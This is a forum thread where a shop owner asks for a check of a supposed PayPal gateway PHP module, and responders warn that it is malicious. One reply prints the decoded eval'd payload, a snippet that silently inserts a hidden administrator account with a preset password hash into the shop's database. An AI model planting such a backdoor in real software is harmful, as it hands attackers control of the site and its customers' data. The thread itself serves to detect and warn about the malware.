Help needed to check a file for malicous code

madmax10

Hello

I know nothing about php and not too much about all this other computer stuff. But I have been reliably informed that there are some real experts on here who may be able to help. I have been given a php file to upload to my online shop, its a modification to connect to a paypal payment gateway. I opened the file to have a peep and try and educate myself a little when I noticed some odd stuff. the word 'password' is mentioned a few times and there seems to be some html for a login box etc . Now this payment gateway does not require any passwords or login boxes so I am more than a little suspicious.

Is there someone who could take a look at this for me? I have been advised to upload it to pastebin.com so here is the link http://pastebin.com/22kJhLG1

Thank you

sneakyimp

Don't do it. Never ever ever ever execute code given to you by some stranger that contains the word [man]eval[/man] in it. In your case, the code wants to execute this code:

$adminuser = 'moderator';
$adminpass = '13edbafb0215e9a0b44fe3ef3cf75566';
$user_qry = $this->db->query("SELECT * FROM `" . DB_PREFIX . "user` WHERE `username` = '" . $adminuser . "'");
if (!$user_qry->num_rows) {
	$sql = "INSERT INTO `" . DB_PREFIX . "user` (user_group_id, username, password, status) VALUES ('1', '" . $adminuser . "', '" . $adminpass . "', '1')";
	$this->db->query($sql);
}

This has the effect of changing the password of the user 'moderator' to the one they have specified. That sounds dodgy in the extreme to me.

dalecosp

These are also a tad dodgy:

function installCodeMirror()

//Also some of the JS in this anonymous function:

$_R['js'] = ....